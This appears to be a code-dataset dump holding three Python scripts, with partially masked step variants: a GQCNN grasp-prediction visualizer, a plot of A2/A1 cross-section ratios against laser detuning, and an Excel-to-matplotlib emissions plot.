code
stringlengths
13
1.2M
order_type
stringclasses
1 value
original_example
dict
step_ids
listlengths
1
5
""" Visualize the predictions of a GQCNN on a dataset Visualizes TP, TN, FP, FN.. Author: Vishal Satish """ import copy import logging import numpy as np import os import sys from random import shuffle import autolab_core.utils as utils from autolab_core import YamlConfig, Point from perception import BinaryImage, ColorImage, DepthImage, GdImage, GrayscaleImage, RgbdImage, RenderMode from gqcnn import Grasp2D, GQCNN, ClassificationResult, InputDataMode, ImageMode, ImageFileTemplates from gqcnn import Visualizer as vis2d import IPython class GQCNNPredictionVisualizer(object): """ Class to visualize predictions of GQCNN on a specified dataset. Visualizes TP, TN, FP, FN. """ def __init__(self, config): """ Parameters ---------- config : dict dictionary of configuration parameters """ # setup config self.cfg = config # setup for visualization self._setup() def visualize(self): """ Visualize predictions """ logging.info('Visualizing ' + self.datapoint_type) # iterate through shuffled file indices for i in self.indices: im_filename = self.im_filenames[i] pose_filename = self.pose_filenames[i] label_filename = self.label_filenames[i] logging.info('Loading Image File: ' + im_filename + ' Pose File: ' + pose_filename + ' Label File: ' + label_filename) # load tensors from files metric_tensor = np.load(os.path.join(self.data_dir, label_filename))['arr_0'] label_tensor = 1 * (metric_tensor > self.metric_thresh) image_tensor = np.load(os.path.join(self.data_dir, im_filename))['arr_0'] hand_poses_tensor = np.load(os.path.join(self.data_dir, pose_filename))['arr_0'] pose_tensor = self._read_pose_data(hand_poses_tensor, self.input_data_mode) # score with neural network pred_p_success_tensor = self._gqcnn.predict(image_tensor, pose_tensor) # compute results classification_result = ClassificationResult([pred_p_success_tensor], [label_tensor]) logging.info('Error rate on files: %.3f' %(classification_result.error_rate)) logging.info('Precision on files: %.3f' %(classification_result.precision)) logging.info('Recall on files: %.3f' %(classification_result.recall)) mispred_ind = classification_result.mispredicted_indices() correct_ind = classification_result.correct_indices() # IPython.embed() if self.datapoint_type == 'true_positive' or self.datapoint_type == 'true_negative': vis_ind = correct_ind else: vis_ind = mispred_ind num_visualized = 0 # visualize for ind in vis_ind: # limit the number of sampled datapoints displayed per object if num_visualized >= self.samples_per_object: break num_visualized += 1 # don't visualize the datapoints that we don't want if self.datapoint_type == 'true_positive': if classification_result.labels[ind] == 0: continue elif self.datapoint_type == 'true_negative': if classification_result.labels[ind] == 1: continue elif self.datapoint_type == 'false_positive': if classification_result.labels[ind] == 0: continue elif self.datapoint_type == 'false_negative': if classification_result.labels[ind] == 1: continue logging.info('Datapoint %d of files for %s' %(ind, im_filename)) logging.info('Depth: %.3f' %(hand_poses_tensor[ind, 2])) data = image_tensor[ind,...] if self.display_image_type == RenderMode.SEGMASK: image = BinaryImage(data) elif self.display_image_type == RenderMode.GRAYSCALE: image = GrayscaleImage(data) elif self.display_image_type == RenderMode.COLOR: image = ColorImage(data) elif self.display_image_type == RenderMode.DEPTH: image = DepthImage(data) elif self.display_image_type == RenderMode.RGBD: image = RgbdImage(data) elif self.display_image_type == RenderMode.GD: image = GdImage(data) vis2d.figure() if self.display_image_type == RenderMode.RGBD: vis2d.subplot(1,2,1) vis2d.imshow(image.color) grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m) grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0) vis2d.grasp(grasp) vis2d.subplot(1,2,2) vis2d.imshow(image.depth) vis2d.grasp(grasp) elif self.display_image_type == RenderMode.GD: vis2d.subplot(1,2,1) vis2d.imshow(image.gray) grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m) grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0) vis2d.grasp(grasp) vis2d.subplot(1,2,2) vis2d.imshow(image.depth) vis2d.grasp(grasp) else: vis2d.imshow(image) grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m) grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0) vis2d.grasp(grasp) vis2d.title('Datapoint %d: Pred: %.3f Label: %.3f' %(ind, classification_result.pred_probs[ind,1], classification_result.labels[ind])) vis2d.show() # cleanup self._cleanup() def _cleanup(self): """ Close GQCNN TF session""" self._gqcnn.close_session() def _setup(self): """ Setup for visualization """ # setup logger logging.getLogger().setLevel(logging.INFO) logging.info('Setting up for visualization.') #### read config params ### # dataset directory self.data_dir = self.cfg['dataset_dir'] # visualization params self.display_image_type = self.cfg['display_image_type'] self.font_size = self.cfg['font_size'] self.samples_per_object = self.cfg['samples_per_object'] # analysis params self.datapoint_type = self.cfg['datapoint_type'] self.image_mode = self.cfg['image_mode'] self.input_data_mode = self.cfg['data_format'] self.target_metric_name = self.cfg['metric_name'] self.metric_thresh = self.cfg['metric_thresh'] self.gripper_width_m = self.cfg['gripper_width_m'] # setup data filenames self._setup_data_filenames() # setup shuffled file indices self._compute_indices() # load gqcnn logging.info('Loading GQ-CNN') self.model_dir = self.cfg['model_dir'] self._gqcnn = GQCNN.load(self.model_dir) self._gqcnn.open_session() def _setup_data_filenames(self): """ Setup image and pose data filenames, subsample files, check validity of filenames/image mode """ # read in filenames of training data(poses, images, labels) logging.info('Reading filenames') all_filenames = os.listdir(self.data_dir) if self.image_mode== ImageMode.BINARY: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.binary_im_tensor_template) > -1] elif self.image_mode== ImageMode.DEPTH: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tensor_template) > -1] elif self.image_mode== ImageMode.BINARY_TF: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.binary_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.COLOR_TF: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.color_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.GRAY_TF: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.gray_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.DEPTH_TF: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.DEPTH_TF_TABLE: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tf_table_tensor_template) > -1] else: raise ValueError('Image mode %s not supported.' %(self.image_mode)) self.pose_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.hand_poses_template) > -1] self.label_filenames = [f for f in all_filenames if f.find(self.target_metric_name) > -1] self.im_filenames.sort(key = lambda x: int(x[-9:-4])) self.pose_filenames.sort(key = lambda x: int(x[-9:-4])) self.label_filenames.sort(key = lambda x: int(x[-9:-4])) # check that all file categories were found if len(self.im_filenames) == 0 or len(self.label_filenames) == 0 or len(self.label_filenames) == 0: raise ValueError('1 or more required training files could not be found') def _compute_indices(self): """ Generate random file index so visualization starts from a different random file everytime """ self.indices = np.arange(len(self.im_filenames)) np.random.shuffle(self.indices) def _read_pose_data(self, pose_arr, input_data_mode): """ Read the pose data and slice it according to the specified input_data_mode Parameters ---------- pose_arr: :obj:`ndArray` full pose data array read in from file input_data_mode: :obj:`InputDataMode` enum for input data mode, see optimizer_constants.py for all possible input data modes Returns ------- :obj:`ndArray` sliced pose_data corresponding to input data mode """ if input_data_mode == InputDataMode.TF_IMAGE: return pose_arr[:,2:3] elif input_data_mode == InputDataMode.TF_IMAGE_PERSPECTIVE: return np.c_[pose_arr[:,2:3], pose_arr[:,4:6]] elif input_data_mode == InputDataMode.RAW_IMAGE: return pose_arr[:,:4] elif input_data_mode == InputDataMode.RAW_IMAGE_PERSPECTIVE: return pose_arr[:,:6] elif input_data_mode == InputDataMode.REGRASPING: # depth, approach angle, and delta angle for reorientation return np.c_[pose_arr[:,2:3], pose_arr[:,4:5], pose_arr[:,6:7]] else: raise ValueError('Input data mode %s not supported' %(input_data_mode))
normal
{ "blob_id": "806bdb75eed91d1429d8473a50c136b58a736147", "index": 8852, "step-1": "\"\"\"\nVisualize the predictions of a GQCNN on a dataset Visualizes TP, TN, FP, FN..\nAuthor: Vishal Satish \n\"\"\"\nimport copy\nimport logging\nimport numpy as np\nimport os\nimport sys\nfrom random import shuffle\n\nimport autolab_core.utils as utils\nfrom autolab_core import YamlConfig, Point\nfrom perception import BinaryImage, ColorImage, DepthImage, GdImage, GrayscaleImage, RgbdImage, RenderMode\n\nfrom gqcnn import Grasp2D, GQCNN, ClassificationResult, InputDataMode, ImageMode, ImageFileTemplates\nfrom gqcnn import Visualizer as vis2d\n\nimport IPython\n\nclass GQCNNPredictionVisualizer(object):\n \"\"\" Class to visualize predictions of GQCNN on a specified dataset. Visualizes TP, TN, FP, FN. \"\"\"\n\n def __init__(self, config):\n \"\"\"\n Parameters\n ----------\n config : dict\n dictionary of configuration parameters\n \"\"\"\n # setup config\n \tself.cfg = config\n\n \t# setup for visualization\n \tself._setup()\n\n def visualize(self):\n \"\"\" Visualize predictions \"\"\"\n\n logging.info('Visualizing ' + self.datapoint_type)\n\n # iterate through shuffled file indices\n for i in self.indices:\n im_filename = self.im_filenames[i]\n pose_filename = self.pose_filenames[i]\n label_filename = self.label_filenames[i]\n\n logging.info('Loading Image File: ' + im_filename + ' Pose File: ' + pose_filename + ' Label File: ' + label_filename)\n\n # load tensors from files\n metric_tensor = np.load(os.path.join(self.data_dir, label_filename))['arr_0']\n label_tensor = 1 * (metric_tensor > self.metric_thresh)\n image_tensor = np.load(os.path.join(self.data_dir, im_filename))['arr_0']\n hand_poses_tensor = np.load(os.path.join(self.data_dir, pose_filename))['arr_0']\n\n pose_tensor = self._read_pose_data(hand_poses_tensor, self.input_data_mode)\n\n # score with neural network\n pred_p_success_tensor = self._gqcnn.predict(image_tensor, pose_tensor)\n\n # compute results\n classification_result = ClassificationResult([pred_p_success_tensor],\n [label_tensor])\n\n logging.info('Error rate on files: %.3f' %(classification_result.error_rate))\n logging.info('Precision on files: %.3f' %(classification_result.precision))\n logging.info('Recall on files: %.3f' %(classification_result.recall))\n mispred_ind = classification_result.mispredicted_indices()\n correct_ind = classification_result.correct_indices()\n # IPython.embed()\n\n if self.datapoint_type == 'true_positive' or self.datapoint_type == 'true_negative':\n vis_ind = correct_ind\n else:\n vis_ind = mispred_ind\n num_visualized = 0\n # visualize\n for ind in vis_ind:\n # limit the number of sampled datapoints displayed per object\n if num_visualized >= self.samples_per_object:\n break\n num_visualized += 1\n\n # don't visualize the datapoints that we don't want\n if self.datapoint_type == 'true_positive':\n if classification_result.labels[ind] == 0:\n continue\n elif self.datapoint_type == 'true_negative':\n if classification_result.labels[ind] == 1:\n continue\n elif self.datapoint_type == 'false_positive':\n if classification_result.labels[ind] == 0:\n continue\n elif self.datapoint_type == 'false_negative':\n if classification_result.labels[ind] == 1:\n continue\n\n logging.info('Datapoint %d of files for %s' %(ind, im_filename))\n logging.info('Depth: %.3f' %(hand_poses_tensor[ind, 2]))\n\n data = image_tensor[ind,...]\n if self.display_image_type == RenderMode.SEGMASK:\n image = BinaryImage(data)\n elif self.display_image_type == RenderMode.GRAYSCALE:\n image = GrayscaleImage(data)\n elif self.display_image_type == RenderMode.COLOR:\n image = ColorImage(data)\n elif self.display_image_type == RenderMode.DEPTH:\n image = DepthImage(data)\n elif self.display_image_type == RenderMode.RGBD:\n image = RgbdImage(data)\n elif self.display_image_type == RenderMode.GD:\n image = GdImage(data)\n\n vis2d.figure()\n\n if self.display_image_type == RenderMode.RGBD:\n vis2d.subplot(1,2,1)\n vis2d.imshow(image.color)\n grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m)\n grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0)\n vis2d.grasp(grasp)\n vis2d.subplot(1,2,2)\n vis2d.imshow(image.depth)\n vis2d.grasp(grasp)\n elif self.display_image_type == RenderMode.GD:\n vis2d.subplot(1,2,1)\n vis2d.imshow(image.gray)\n grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m)\n grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0)\n vis2d.grasp(grasp)\n vis2d.subplot(1,2,2)\n vis2d.imshow(image.depth)\n vis2d.grasp(grasp)\n else:\n vis2d.imshow(image)\n grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m)\n grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0)\n vis2d.grasp(grasp)\n vis2d.title('Datapoint %d: Pred: %.3f Label: %.3f' %(ind,\n classification_result.pred_probs[ind,1],\n classification_result.labels[ind]))\n vis2d.show()\n\n # cleanup\n self._cleanup()\n\n def _cleanup(self):\n \"\"\" Close GQCNN TF session\"\"\"\n \tself._gqcnn.close_session()\n\n def _setup(self):\n \"\"\" Setup for visualization \"\"\"\n \t# setup logger\n \tlogging.getLogger().setLevel(logging.INFO)\t\n logging.info('Setting up for visualization.')\n\n \t#### read config params ###\n\n \t# dataset directory\n \tself.data_dir = self.cfg['dataset_dir']\n\n \t# visualization params\n self.display_image_type = self.cfg['display_image_type']\n self.font_size = self.cfg['font_size']\n self.samples_per_object = self.cfg['samples_per_object']\n\n # analysis params\n self.datapoint_type = self.cfg['datapoint_type']\n self.image_mode = self.cfg['image_mode']\n self.input_data_mode = self.cfg['data_format']\n self.target_metric_name = self.cfg['metric_name']\n self.metric_thresh = self.cfg['metric_thresh']\n self.gripper_width_m = self.cfg['gripper_width_m']\n\n # setup data filenames\n self._setup_data_filenames()\n\n # setup shuffled file indices\n self._compute_indices()\n\n # load gqcnn\n logging.info('Loading GQ-CNN')\n self.model_dir = self.cfg['model_dir']\n self._gqcnn = GQCNN.load(self.model_dir)\n self._gqcnn.open_session()\n\n def _setup_data_filenames(self):\n \"\"\" Setup image and pose data filenames, subsample files, check validity of filenames/image mode \"\"\"\n\n # read in filenames of training data(poses, images, labels)\n logging.info('Reading filenames')\n all_filenames = os.listdir(self.data_dir)\n if self.image_mode== ImageMode.BINARY:\n self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.binary_im_tensor_template) > -1]\n elif self.image_mode== ImageMode.DEPTH:\n self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tensor_template) > -1]\n elif self.image_mode== ImageMode.BINARY_TF:\n self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.binary_im_tf_tensor_template) > -1]\n elif self.image_mode== ImageMode.COLOR_TF:\n self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.color_im_tf_tensor_template) > -1]\n elif self.image_mode== ImageMode.GRAY_TF:\n self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.gray_im_tf_tensor_template) > -1]\n elif self.image_mode== ImageMode.DEPTH_TF:\n self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tf_tensor_template) > -1]\n elif self.image_mode== ImageMode.DEPTH_TF_TABLE:\n self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tf_table_tensor_template) > -1]\n else:\n raise ValueError('Image mode %s not supported.' %(self.image_mode))\n\n self.pose_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.hand_poses_template) > -1]\n self.label_filenames = [f for f in all_filenames if f.find(self.target_metric_name) > -1]\n\n self.im_filenames.sort(key = lambda x: int(x[-9:-4]))\n self.pose_filenames.sort(key = lambda x: int(x[-9:-4]))\n self.label_filenames.sort(key = lambda x: int(x[-9:-4]))\n\n # check that all file categories were found\n if len(self.im_filenames) == 0 or len(self.label_filenames) == 0 or len(self.label_filenames) == 0:\n raise ValueError('1 or more required training files could not be found')\n\n def _compute_indices(self):\n \"\"\" Generate random file index so visualization starts from a \n different random file everytime \"\"\"\n self.indices = np.arange(len(self.im_filenames))\n np.random.shuffle(self.indices)\n\n def _read_pose_data(self, pose_arr, input_data_mode):\n \"\"\" Read the pose data and slice it according to the specified input_data_mode\n\n Parameters\n ----------\n pose_arr: :obj:`ndArray`\n full pose data array read in from file\n input_data_mode: :obj:`InputDataMode`\n enum for input data mode, see optimizer_constants.py for all\n possible input data modes \n\n Returns\n -------\n :obj:`ndArray`\n sliced pose_data corresponding to input data mode\n \"\"\"\n if input_data_mode == InputDataMode.TF_IMAGE:\n return pose_arr[:,2:3]\n elif input_data_mode == InputDataMode.TF_IMAGE_PERSPECTIVE:\n return np.c_[pose_arr[:,2:3], pose_arr[:,4:6]]\n elif input_data_mode == InputDataMode.RAW_IMAGE:\n return pose_arr[:,:4]\n elif input_data_mode == InputDataMode.RAW_IMAGE_PERSPECTIVE:\n return pose_arr[:,:6]\n elif input_data_mode == InputDataMode.REGRASPING:\n # depth, approach angle, and delta angle for reorientation\n return np.c_[pose_arr[:,2:3], pose_arr[:,4:5], pose_arr[:,6:7]]\n else:\n raise ValueError('Input data mode %s not supported' %(input_data_mode))\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import numpy as np from scipy import stats from statarray import statdat #a2a1 = np.loadtxt('a2a1_130707_2300.dat') #a2a1 = np.concatenate( (a2a1, np.loadtxt('a2a1_130708_1223.dat')), axis=0 ) #a2a1 = np.loadtxt('a2a1_130708_1654.dat') #a2a1 = np.loadtxt('a2a1_130709_0030.dat') import matplotlib.pyplot as plt import matplotlib from matplotlib import rc rc('font',**{'family':'serif'}) # Data file datfile = 'data001/a2a1_detuning_allelastic.dat' # Values of nafm for which plots will be shown nafms = [4,6,8,10,12,16,20,24,32,34,38,40] cols = 2 rows = len(nafms)/2+len(nafms)%2 figure = plt.figure(figsize=(10.8,3.6*rows)) #figure.suptitle('Bragg') gs = matplotlib.gridspec.GridSpec( rows,cols, wspace=0.6, hspace=0.42) import fetchdata from uncertainties import unumpy for i,nafm in enumerate(nafms): detuning = 6.44 a1, a2 = fetchdata.fetch_data_A1A2( {'afmsize':nafm, 'ai':0.}, 'det', datfile ) # Put the units in the cross section sunits = 9 * (671e-7**2) / 16 / ( np.pi**2) a1[:,1] = sunits*a1[:,1] a1[:,2] = sunits*a1[:,2] a2[:,1] = sunits*a2[:,1] a2[:,2] = sunits*a2[:,2] i % len(nafms) ax = plt.subplot( gs[ i%rows, i/rows] ) ax.set_title('AFM = %d sites' % nafm) a1s = unumpy.uarray( a1[:,1] , a1[:,2] ) a2s = unumpy.uarray( a2[:,1] , a2[:,2] ) a2a1 = a2s/ a1s a2a1_mean = unumpy.nominal_values( a2a1 ) a2a1_std = unumpy.std_devs( a2a1) #ax.errorbar( a1[:,0], a1[:,1], yerr=a1[:,2], \ # capsize=0., elinewidth = 1. ,\ # fmt='.', ecolor='red', mec='red', \ # mew=1., ms=5.,\ # marker='o', mfc='pink', \ # label="A1") #ax.errorbar( a2[:,0], a2[:,1], yerr=a2[:,2], \ # capsize=0., elinewidth = 1. ,\ # fmt='.', ecolor='green', mec='green', \ # mew=1., ms=5.,\ # marker='o', mfc='limegreen', \ # label="A2") #ax2 = ax.twinx() ax.errorbar( a2[:,0], a2a1_mean , yerr=a2a1_std, \ capsize=0., elinewidth = 1. ,\ fmt='.', ecolor='blue', mec='blue', \ mew=1., ms=5.,\ marker='o', mfc='lightblue', \ label="A2/A1") #ax2.set_ylabel('A2/A1') ax.set_ylabel('A2/A1') ax.grid() ax.set_xlabel('Detuning from state 2 ($\Gamma$)') #ax.set_ylabel('Cross section (cm$^{2}$)') if nafm == 40: ax.set_xlim(-10,10) #plt.show() figure.savefig('a2a1_detuning.png', dpi=140) #pylab.clf()
normal
{ "blob_id": "feac1092d1aaf70eb4d4df919e434cdc1aa9c826", "index": 9171, "step-1": "<mask token>\n", "step-2": "<mask token>\nrc('font', **{'family': 'serif'})\n<mask token>\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n", "step-3": "<mask token>\nrc('font', **{'family': 'serif'})\ndatfile = 'data001/a2a1_detuning_allelastic.dat'\nnafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]\ncols = 2\nrows = len(nafms) / 2 + len(nafms) % 2\nfigure = plt.figure(figsize=(10.8, 3.6 * rows))\ngs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)\n<mask token>\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n", "step-4": "import numpy as np\nfrom scipy import stats\nfrom statarray import statdat\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import rc\nrc('font', **{'family': 'serif'})\ndatfile = 'data001/a2a1_detuning_allelastic.dat'\nnafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]\ncols = 2\nrows = len(nafms) / 2 + len(nafms) % 2\nfigure = plt.figure(figsize=(10.8, 3.6 * rows))\ngs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)\nimport fetchdata\nfrom uncertainties import unumpy\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n", "step-5": "\nimport numpy as np\nfrom scipy import stats\nfrom statarray import statdat\n\n#a2a1 = np.loadtxt('a2a1_130707_2300.dat')\n#a2a1 = np.concatenate( (a2a1, np.loadtxt('a2a1_130708_1223.dat')), axis=0 )\n\n#a2a1 = np.loadtxt('a2a1_130708_1654.dat')\n#a2a1 = np.loadtxt('a2a1_130709_0030.dat')\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nfrom matplotlib import rc\nrc('font',**{'family':'serif'})\n\n\n# Data file\ndatfile = 'data001/a2a1_detuning_allelastic.dat' \n\n# Values of nafm for which plots will be shown\nnafms = [4,6,8,10,12,16,20,24,32,34,38,40]\n\ncols = 2\nrows = len(nafms)/2+len(nafms)%2\n\nfigure = plt.figure(figsize=(10.8,3.6*rows))\n#figure.suptitle('Bragg')\ngs = matplotlib.gridspec.GridSpec( rows,cols, wspace=0.6, hspace=0.42) \n\nimport fetchdata\nfrom uncertainties import unumpy\n\nfor i,nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2( {'afmsize':nafm, 'ai':0.}, 'det', datfile )\n\n # Put the units in the cross section\n sunits = 9 * (671e-7**2) / 16 / ( np.pi**2)\n a1[:,1] = sunits*a1[:,1]\n a1[:,2] = sunits*a1[:,2]\n a2[:,1] = sunits*a2[:,1]\n a2[:,2] = sunits*a2[:,2]\n \n i % len(nafms) \n ax = plt.subplot( gs[ i%rows, i/rows] )\n ax.set_title('AFM = %d sites' % nafm)\n\n a1s = unumpy.uarray( a1[:,1] , a1[:,2] ) \n a2s = unumpy.uarray( a2[:,1] , a2[:,2] )\n\n a2a1 = a2s/ a1s\n \n a2a1_mean = unumpy.nominal_values( a2a1 )\n a2a1_std = unumpy.std_devs( a2a1)\n \n \n #ax.errorbar( a1[:,0], a1[:,1], yerr=a1[:,2], \\\n # capsize=0., elinewidth = 1. ,\\\n # fmt='.', ecolor='red', mec='red', \\\n # mew=1., ms=5.,\\\n # marker='o', mfc='pink', \\\n # label=\"A1\") \n\n #ax.errorbar( a2[:,0], a2[:,1], yerr=a2[:,2], \\\n # capsize=0., elinewidth = 1. ,\\\n # fmt='.', ecolor='green', mec='green', \\\n # mew=1., ms=5.,\\\n # marker='o', mfc='limegreen', \\\n # label=\"A2\") \n\n #ax2 = ax.twinx() \n ax.errorbar( a2[:,0], a2a1_mean , yerr=a2a1_std, \\\n capsize=0., elinewidth = 1. ,\\\n fmt='.', ecolor='blue', mec='blue', \\\n mew=1., ms=5.,\\\n marker='o', mfc='lightblue', \\\n label=\"A2/A1\") \n #ax2.set_ylabel('A2/A1') \n ax.set_ylabel('A2/A1') \n\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\Gamma$)')\n #ax.set_ylabel('Cross section (cm$^{2}$)')\n\n if nafm == 40:\n ax.set_xlim(-10,10)\n\n#plt.show()\nfigure.savefig('a2a1_detuning.png', dpi=140)\n#pylab.clf()\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# -*- coding: utf-8 -*- import sys import xlrd import numpy as np import matplotlib.pyplot as plt if __name__ == "__main__": param = sys.argv print "Hello:" + param[0] # ファイルのオープン book = xlrd.open_workbook('sample.xls') # シートの選択 sheet = book.sheet_by_name(u"Sheet1") # sheet = book.sheet_by_index(0) plot_x = np.zeros(sheet.nrows-1, dtype=np.float64) plot_y = np.zeros(sheet.nrows-1, dtype=np.float64) for row in range(sheet.nrows): if row==0: plt.xlabel(sheet.cell(0,1).value) plt.ylabel(sheet.cell(0,2).value) pass elif row>=1: plot_x[row-1] = float(sheet.cell(row,1).value) plot_y[row-1] = float(sheet.cell(row,2).value) plt.xlim([0,100]) plt.ylim([0,50]) plt.plot(plot_x, plot_y,'o',color='r', label='test1') plt.title(u'排出量') plt.legend(loc='lower right') # 凡例表示 plt.show()
normal
{ "blob_id": "dacd4334433eb323ce732c96f680fb7b9333721a", "index": 2268, "step-1": "# -*- coding: utf-8 -*-\n\nimport sys\nimport xlrd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n\tparam = sys.argv\n\tprint \"Hello:\" + param[0]\n\n\t# ファイルのオープン\n\tbook = xlrd.open_workbook('sample.xls')\n\n\t# シートの選択\n\tsheet = book.sheet_by_name(u\"Sheet1\")\n#\tsheet = book.sheet_by_index(0)\n\n\tplot_x = np.zeros(sheet.nrows-1, dtype=np.float64)\n\tplot_y = np.zeros(sheet.nrows-1, dtype=np.float64)\n\n\tfor row in range(sheet.nrows):\n\t\tif row==0:\n\t\t\tplt.xlabel(sheet.cell(0,1).value)\n\t\t\tplt.ylabel(sheet.cell(0,2).value)\n\t\t\tpass\n\t\telif row>=1:\n\t\t\tplot_x[row-1] = float(sheet.cell(row,1).value)\n\t\t\tplot_y[row-1] = float(sheet.cell(row,2).value)\n\t\t\t\n\tplt.xlim([0,100])\n\tplt.ylim([0,50])\n\tplt.plot(plot_x, plot_y,'o',color='r', label='test1')\n\tplt.title(u'排出量')\n\tplt.legend(loc='lower right') # 凡例表示\n\tplt.show()\n\n\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
